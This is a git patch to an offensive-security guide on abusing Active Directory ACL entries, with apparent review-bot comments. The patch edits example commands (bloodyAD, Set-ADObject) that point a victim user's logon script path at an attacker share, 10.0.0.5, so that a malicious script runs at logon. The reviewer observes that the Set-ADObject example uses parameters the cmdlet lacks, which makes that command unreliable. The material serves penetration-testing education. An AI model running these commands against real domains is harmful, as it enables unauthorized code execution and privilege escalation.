From dce118cea39a70ab59f3135c476edbe96d0bae71 Mon Sep 17 00:00:00 2001 From: Mozhar Alhosni Date: Fri, 15 Mar 2024 21:21:16 +0800 Subject: [PATCH] Update ad-adds-acl-ace.md ScriptPath ([scriptPath](https://learn.microsoft.com/en-us/windows/win32/adschema/a-scriptpath)/[msTSInitialProgram](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-ada2/7f65d267-8a3f-4070-b94a-111e793d4821)) does NOT support `PowerShell` files, see the below links for more on what extensions can it run: - https://redmondmag.com/articles/2016/02/09/logon-scripts-for-active-directory.aspx - https://www.rlmueller.net/LogonScriptFAQ.htm#What%20languages%20can%20I%20use%20for%20logon%20scripts --- docs/active-directory/ad-adds-acl-ace.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/docs/active-directory/ad-adds-acl-ace.md b/docs/active-directory/ad-adds-acl-ace.md index 6188055..0a721e1 100644 --- a/docs/active-directory/ad-adds-acl-ace.md +++ b/docs/active-directory/ad-adds-acl-ace.md @@ -105,11 +105,11 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr * WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : * Windows/Linux: ```ps1 - bloodyAD --host 10.0.0.5 -d example.lab -u attacker -p 'Password123*' set object delegate scriptpath -v '\\10.0.0.5\totallyLegitScript.ps1' + bloodyAD --host 10.0.0.5 -d example.lab -u attacker -p 'Password123*' set object delegate scriptpath -v '\\10.0.0.5\totallyLegitScript.bat' ``` * Windows only: ```ps1 - Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1" + Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.bat" ``` ### Group 
@@ -255,4 +255,4 @@ An attacker can change the password of the user this ACE applies to: * [ACE to RCE - @JustinPerdok - July 24, 2020](https://sensepost.com/blog/2020/ace-to-rce/) * [Access Control Entries (ACEs) - The Hacker Recipes - @_nwodtuhs](https://www.thehacker.recipes/active-directory-domain-services/movement/abusing-aces) -* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) \ No newline at end of file +* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
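Review bot: In the first hunk (the `scriptpath` examples at lines 105-111 of ad-adds-acl-ace.md), the rationale for switching `.ps1` to `.bat` lives only in the commit message; the doc itself still says "their system will execute our malicious script" with no hint that `scriptPath` is processed by the logon-script mechanism and does not run PowerShell files. Add one sentence to the bullet above the examples stating that the value must point at a file type the logon script mechanism will run (batch, for example), otherwise the next reader will "fix" it back to `.ps1`. Two smaller points on the same hunk: the Windows-only line `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "..."` uses parameter names that the ActiveDirectory module's `Set-ADObject` does not define (it takes `-Identity` and `-Replace`), so that example should be checked against the cmdlet's documented parameters while it is being touched; and the "Windows/Linux" bloodyAD command is fenced as `ps1` although it is a shell invocation, so a `bash` or plain fence would be more accurate.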
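Review bot: The second hunk (line 258 of ad-adds-acl-ace.md) only adds the missing trailing newline to the last reference entry, which is unrelated to the `scriptPath` extension fix described in the commit message. Either mention the whitespace fix in the commit message or keep it as a separate commit so the history of the `.bat` change stays self-explanatory; the content of the line is unchanged and correct.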